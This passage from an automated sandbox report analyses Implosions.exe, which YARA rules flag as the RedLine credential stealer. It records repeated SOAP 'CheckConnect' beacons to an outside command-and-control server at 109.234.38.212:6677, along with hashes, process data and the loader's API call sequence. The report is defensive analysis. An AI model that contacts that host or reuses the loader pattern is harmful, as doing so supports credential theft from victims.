            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.449745109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:53.138214111 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.449746109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:37:59.794393063 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.449747109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:06.434892893 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.449748109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:14.076097965 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.449749109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:20.685306072 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.449750109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:27.294527054 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.449751109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:33.915535927 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.449752109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:40.575736046 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.449753109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:47.200839996 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.449754109.234.38.21266777544C:\Users\user\Desktop\Implosions.exe
            TimestampBytes transferredDirectionData
            Sep 6, 2024 06:38:53.888549089 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 109.234.38.212:6677
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:00:36:55
            Start date:06/09/2024
            Path:C:\Users\user\Desktop\Implosions.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\Implosions.exe"
            Imagebase:0x400000
            File size:187'904 bytes
            MD5 hash:AEED85E8A5B1D2013EA6FA0348E954D7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low
            Has exited:false

            General

            Target ID:1
            Start time:00:36:55
            Start date:06/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:10%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:20.4%
              Total number of Nodes:221
              Total number of Limit Nodes:25
              execution_graph 67128 40cbf7 67129 40cc08 67128->67129 67169 40d534 HeapCreate 67129->67169 67132 40cc46 67171 41087e GetModuleHandleW 67132->67171 67136 40cc57 __RTC_Initialize 67205 411a15 67136->67205 67139 40cc66 67140 40cc72 GetCommandLineA 67139->67140 67279 40e79a 62 API calls 3 library calls 67139->67279 67220 412892 71 API calls 3 library calls 67140->67220 67143 40cc82 67280 4127d7 107 API calls 3 library calls 67143->67280 67144 40cc71 67144->67140 67146 40cc8c 67147 40cc90 67146->67147 67148 40cc98 67146->67148 67281 40e79a 62 API calls 3 library calls 67147->67281 67221 41255f 106 API calls 6 library calls 67148->67221 67151 40cc97 67151->67148 67152 40cc9d 67153 40cca1 67152->67153 67154 40cca9 67152->67154 67282 40e79a 62 API calls 3 library calls 67153->67282 67222 40e859 73 API calls 5 library calls 67154->67222 67157 40ccb0 67159 40ccb5 67157->67159 67160 40ccbc 67157->67160 67158 40cca8 67158->67154 67283 40e79a 62 API calls 3 library calls 67159->67283 67223 4019f0 OleInitialize 67160->67223 67163 40ccbb 67163->67160 67164 40ccd8 67165 40ccea 67164->67165 67284 40ea0a 62 API calls _doexit 67164->67284 67285 40ea36 62 API calls _doexit 67165->67285 67168 40ccef __fdopen 67170 40cc3a 67169->67170 67170->67132 67277 40cbb4 62 API calls 3 library calls 67170->67277 67172 410892 67171->67172 67173 410899 67171->67173 67286 40e76a Sleep GetModuleHandleW 67172->67286 67175 410a01 67173->67175 67176 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 67173->67176 67302 410598 7 API calls __decode_pointer 67175->67302 67178 4108ec TlsAlloc 67176->67178 67177 410898 67177->67173 67181 41093a TlsSetValue 67178->67181 67182 40cc4c 67178->67182 67181->67182 67183 41094b 67181->67183 67182->67136 67278 40cbb4 62 API calls 3 library calls 67182->67278 67287 40ea54 6 API calls 4 library calls 67183->67287 67185 410950 67288 41046e 6 API calls __crt_waiting_on_module_handle 67185->67288 67187 41095b 67289 41046e 6 API calls __crt_waiting_on_module_handle 67187->67289 67189 41096b 67290 41046e 6 API calls __crt_waiting_on_module_handle 67189->67290 67191 41097b 67291 41046e 6 API calls __crt_waiting_on_module_handle 67191->67291 67193 41098b 67292 40d564 InitializeCriticalSectionAndSpinCount __ioinit 67193->67292 67195 410998 67195->67175 67293 4104e9 6 API calls __crt_waiting_on_module_handle 67195->67293 67197 4109ac 67197->67175 67294 411cba 67197->67294 67201 4109df 67201->67175 67202 4109e6 67201->67202 67301 4105d5 62 API calls 5 library calls 67202->67301 67204 4109ee GetCurrentThreadId 67204->67182 67322 40e1d8 67205->67322 67207 411a21 GetStartupInfoA 67208 411cba __calloc_crt 62 API calls 67207->67208 67214 411a42 67208->67214 67209 411c60 __fdopen 67209->67139 67210 411bdd GetStdHandle 67215 411ba7 67210->67215 67211 411c42 SetHandleCount 67211->67209 67212 411cba __calloc_crt 62 API calls 67212->67214 67213 411bef GetFileType 67213->67215 67214->67209 67214->67212 67214->67215 67217 411b2a 67214->67217 67215->67209 67215->67210 67215->67211 67215->67213 67324 41389c InitializeCriticalSectionAndSpinCount __fdopen 67215->67324 67216 411b53 GetFileType 67216->67217 67217->67209 67217->67215 67217->67216 67323 41389c InitializeCriticalSectionAndSpinCount __fdopen 67217->67323 67220->67143 67221->67152 67222->67157 67224 401ab9 67223->67224 67325 40b99e 67224->67325 67226 401abf 67227 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 67226->67227 67253 402467 67226->67253 67228 401dc3 FindCloseChangeNotification GetModuleHandleA 67227->67228 67235 401c55 67227->67235 67338 401650 67228->67338 67230 401e8b FindResourceA LoadResource LockResource SizeofResource 67340 40b84d 67230->67340 67234 401c9c CloseHandle 67234->67164 67235->67234 67238 401cf9 Module32Next 67235->67238 67236 401ecb _memset 67237 401efc SizeofResource 67236->67237 67239 401f1c 67237->67239 67241 401f5f 67237->67241 67238->67228 67251 401d0f 67238->67251 67239->67241 67396 401560 __VEC_memcpy __fptostr 67239->67396 67240 401f92 _memset 67244 401fa2 FreeResource 67240->67244 67241->67240 67397 401560 __VEC_memcpy __fptostr 67241->67397 67245 40b84d _malloc 62 API calls 67244->67245 67246 401fbb SizeofResource 67245->67246 67247 401fe5 _memset 67246->67247 67248 4020aa LoadLibraryA 67247->67248 67249 401650 67248->67249 67250 40216c GetProcAddress 67249->67250 67250->67253 67254 4021aa 67250->67254 67251->67234 67252 401dad Module32Next 67251->67252 67252->67228 67252->67251 67253->67164 67254->67253 67370 4018f0 67254->67370 67256 40243f 67256->67253 67398 40b6b5 62 API calls __fdopen 67256->67398 67258 4021f1 67258->67256 67382 401870 67258->67382 67260 402269 VariantInit 67261 401870 75 API calls 67260->67261 67262 40228b VariantInit 67261->67262 67263 4022a7 67262->67263 67264 4022d9 SafeArrayCreate SafeArrayAccessData 67263->67264 67387 40b350 67264->67387 67267 40232c 67268 402354 SafeArrayDestroy 67267->67268 67276 40235b 67267->67276 67268->67276 67269 402392 SafeArrayCreateVector 67270 4023a4 67269->67270 67271 4023bc VariantClear VariantClear 67270->67271 67389 4019a0 67271->67389 67274 40242e 67275 4019a0 65 API calls 67274->67275 67275->67256 67276->67269 67277->67132 67278->67136 67279->67144 67280->67146 67281->67151 67282->67158 67283->67163 67284->67165 67285->67168 67286->67177 67287->67185 67288->67187 67289->67189 67290->67191 67291->67193 67292->67195 67293->67197 67297 411cc3 67294->67297 67296 4109c5 67296->67175 67300 4104e9 6 API calls __crt_waiting_on_module_handle 67296->67300 67297->67296 67298 411ce1 Sleep 67297->67298 67303 40e231 67297->67303 67299 411cf6 67298->67299 67299->67296 67299->67297 67300->67201 67301->67204 67304 40e23d __fdopen 67303->67304 67305 40e255 67304->67305 67315 40e274 _memset 67304->67315 67316 40bfc1 62 API calls __getptd_noexit 67305->67316 67307 40e25a 67317 40e744 6 API calls 2 library calls 67307->67317 67309 40e2e6 HeapAlloc 67309->67315 67312 40e26a __fdopen 67312->67297 67315->67309 67315->67312 67318 40d6e0 62 API calls 2 library calls 67315->67318 67319 40def2 5 API calls 2 library calls 67315->67319 67320 40e32d LeaveCriticalSection _doexit 67315->67320 67321 40d2e3 6 API calls __decode_pointer 67315->67321 67316->67307 67318->67315 67319->67315 67320->67315 67321->67315 67322->67207 67323->67217 67324->67215 67328 40b9aa __fdopen _strnlen 67325->67328 67326 40b9b8 67399 40bfc1 62 API calls __getptd_noexit 67326->67399 67328->67326 67330 40b9ec 67328->67330 67329 40b9bd 67400 40e744 6 API calls 2 library calls 67329->67400 67401 40d6e0 62 API calls 2 library calls 67330->67401 67333 40b9f3 67402 40b917 120 API calls 3 library calls 67333->67402 67335 40b9ff 67403 40ba18 LeaveCriticalSection _doexit 67335->67403 67336 40b9cd __fdopen 67336->67226 67339 4017cc ___crtGetEnvironmentStringsA 67338->67339 67339->67230 67341 40b900 67340->67341 67350 40b85f 67340->67350 67411 40d2e3 6 API calls __decode_pointer 67341->67411 67343 40b906 67412 40bfc1 62 API calls __getptd_noexit 67343->67412 67348 40b8bc RtlAllocateHeap 67348->67350 67349 40b870 67349->67350 67404 40ec4d 62 API calls 2 library calls 67349->67404 67405 40eaa2 62 API calls 7 library calls 67349->67405 67406 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 67349->67406 67350->67348 67350->67349 67352 40b8ec 67350->67352 67355 40b8f1 67350->67355 67357 401ebf 67350->67357 67407 40b7fe 62 API calls 4 library calls 67350->67407 67408 40d2e3 6 API calls __decode_pointer 67350->67408 67409 40bfc1 62 API calls __getptd_noexit 67352->67409 67410 40bfc1 62 API calls __getptd_noexit 67355->67410 67358 40af66 67357->67358 67360 40af70 67358->67360 67359 40b84d _malloc 62 API calls 67359->67360 67360->67359 67361 40af8a 67360->67361 67365 40af8c std::bad_alloc::bad_alloc 67360->67365 67413 40d2e3 6 API calls __decode_pointer 67360->67413 67361->67236 67363 40afb2 67415 40af49 62 API calls std::exception::exception 67363->67415 67365->67363 67414 40d2bd 73 API calls __cinit 67365->67414 67366 40afbc 67416 40cd39 RaiseException 67366->67416 67369 40afca 67371 401903 lstrlenA 67370->67371 67372 4018fc 67370->67372 67417 4017e0 67371->67417 67372->67258 67375 401940 GetLastError 67377 40194b MultiByteToWideChar 67375->67377 67378 40198d 67375->67378 67376 401996 67376->67258 67379 4017e0 72 API calls 67377->67379 67378->67376 67425 401030 GetLastError 67378->67425 67380 401970 MultiByteToWideChar 67379->67380 67380->67378 67383 40af66 74 API calls 67382->67383 67384 40187c 67383->67384 67385 401885 SysAllocString 67384->67385 67386 4018a4 67384->67386 67385->67386 67386->67260 67388 40231a SafeArrayUnaccessData 67387->67388 67388->67267 67390 4019aa InterlockedDecrement 67389->67390 67395 4019df VariantClear 67389->67395 67391 4019b8 67390->67391 67390->67395 67392 4019c2 SysFreeString 67391->67392 67393 4019c9 67391->67393 67391->67395 67392->67393 67429 40aec0 63 API calls __fdopen 67393->67429 67395->67274 67396->67239 67397->67240 67398->67253 67399->67329 67401->67333 67402->67335 67403->67336 67404->67349 67405->67349 67407->67350 67408->67350 67409->67355 67410->67357 67411->67343 67412->67357 67413->67360 67414->67363 67415->67366 67416->67369 67418 4017e9 67417->67418 67422 40182d 67418->67422 67424 401844 67418->67424 67426 40b783 72 API calls 4 library calls 67418->67426 67422->67424 67427 40b6b5 62 API calls __fdopen 67422->67427 67423 40186d MultiByteToWideChar 67423->67375 67423->67376 67424->67423 67428 40b743 62 API calls 2 library calls 67424->67428 67426->67422 67427->67424 67428->67424 67429->67395

              Executed Functions

              Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->32 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 79 401da0-401da2 76->79 80 401d86-401d88 76->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 20bd01d 122->154 155 40234e call 20bd006 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 20bd01d 135->152 153 402390 call 20bd006 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
              APIs
              • OleInitialize.OLE32(00000000), ref: 004019FD
              • _getenv.LIBCMT ref: 00401ABA
              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
              • Module32First.KERNEL32 ref: 00401C48
              • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
              • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
              • LockResource.KERNEL32(00000000), ref: 00401EA7
              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
              • _malloc.LIBCMT ref: 00401EBA
              • _memset.LIBCMT ref: 00401EDD
              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
              • API String ID: 2366190142-2962942730
              • Opcode ID: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
              • Opcode Fuzzy Hash: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
              Function 05CEA448 Relevance: 1.8, Strings: 1, Instructions: 544COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1849 5cea448-5cea47e call 5ceabeb 1852 5cea484-5cea490 1849->1852 1853 5cea725-5cea741 1849->1853 1856 5cea492 1852->1856 1857 5cea4a3-5cea4bf 1852->1857 1863 5cea752 1853->1863 1864 5cea743 1853->1864 1858 5cea498-5cea49d 1856->1858 1859 5cea882-5cea88b 1856->1859 1873 5cea8ef-5cea8f8 1857->1873 1874 5cea4c5-5cea4c8 1857->1874 1858->1857 1858->1859 1861 5cea88d-5cea893 1859->1861 1862 5cea895-5cea8e8 1859->1862 1861->1862 1862->1873 1866 5cea749-5cea74c 1864->1866 1867 5cea941-5cea94a 1864->1867 1866->1863 1866->1867 1868 5cea94c-5cea952 1867->1868 1869 5cea954-5cea98c 1867->1869 1868->1869 1889 5cea993-5cea99c 1869->1889 1876 5cea8fa-5cea900 1873->1876 1877 5cea902-5cea93a 1873->1877 1874->1873 1880 5cea4ce-5cea4d4 1874->1880 1876->1877 1877->1867 1881 5cea4da-5cea4e5 1880->1881 1882 5cea757 1880->1882 1883 5cea4e7-5cea4ee 1881->1883 1884 5cea4f4-5cea4ff 1881->1884 1892 5cea761-5cea76d 1882->1892 1883->1884 1883->1889 1890 5cea550-5cea554 1884->1890 1891 5cea501-5cea521 call 5ce3048 1884->1891 1899 5cea99e-5cea9a4 1889->1899 1900 5cea9a6-5cea9de 1889->1900 1897 5cea568-5cea572 1890->1897 1898 5cea556-5cea560 1890->1898 1926 5cea527-5cea536 1891->1926 1927 5cea9e5-5cea9ee 1891->1927 1904 5cea82b-5cea82f 1892->1904 1905 5cea773-5cea777 1892->1905 1914 5ceaa6b-5ceaa74 1897->1914 1915 5cea578-5cea5aa 1897->1915 1898->1897 1899->1900 1900->1927 1916 5cea5be-5cea634 call 5cebdb0 1904->1916 1917 5cea835-5cea85b 1904->1917 1912 5ceaaef-5ceaaf8 1905->1912 1913 5cea77d-5cea784 1905->1913 1924 5ceaafa-5ceab00 1912->1924 1925 5ceab02-5ceab41 1912->1925 1921 5cea7c9-5cea7f1 1913->1921 1922 5cea786-5cea7c4 1913->1922 1919 5ceaa7e-5ceaae8 1914->1919 1920 5ceaa76-5ceaa7c 1914->1920 1915->1892 1943 5cea5b0-5cea5b3 1915->1943 1984 5cea63a-5cea663 1916->1984 1917->1916 1919->1912 1920->1919 1930 5cea7fd-5cea826 1921->1930 1931 5cea7f3 1921->1931 1922->1916 1924->1925 1973 5ceab48-5ceabea 1925->1973 1926->1890 1946 5cea538-5cea546 1926->1946 1935 5cea9f8-5ceaa64 1927->1935 1936 5cea9f0-5cea9f6 1927->1936 1930->1916 1931->1930 1935->1914 1936->1935 1943->1916 1946->1890 1984->1973 1992 5cea669-5cea674 1984->1992 1995 5cea67a-5cea6d2 1992->1995 1996 5cea860 1992->1996 1999 5cea867-5cea87f 1995->1999 2012 5cea6d8-5cea6e5 1995->2012 1996->1999 2013 5cea6e7 2012->2013 2014 5cea6f1-5cea71b 2012->2014 2013->2014 2014->1853
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `_q
              • API String ID: 0-2041170535
              • Opcode ID: de0cfec621ef0bc7f3a3ea56c3b1fd5daa373d9c412eb7c3edd26ec2ef6bd856
              • Instruction ID: 3f56da63c3f969c346553022ae4c80445eb76b20e811ae65a6e6154b64c9c0de
              • Opcode Fuzzy Hash: de0cfec621ef0bc7f3a3ea56c3b1fd5daa373d9c412eb7c3edd26ec2ef6bd856
              • Instruction Fuzzy Hash: F7225A30B003459FCB54EBB9D49866EBBF6BF88300B648869E506DB395DF34E946CB50
              Function 021BEB70 Relevance: .9, Instructions: 926COMMON
              Download Yara Rule
              Memory Dump Source
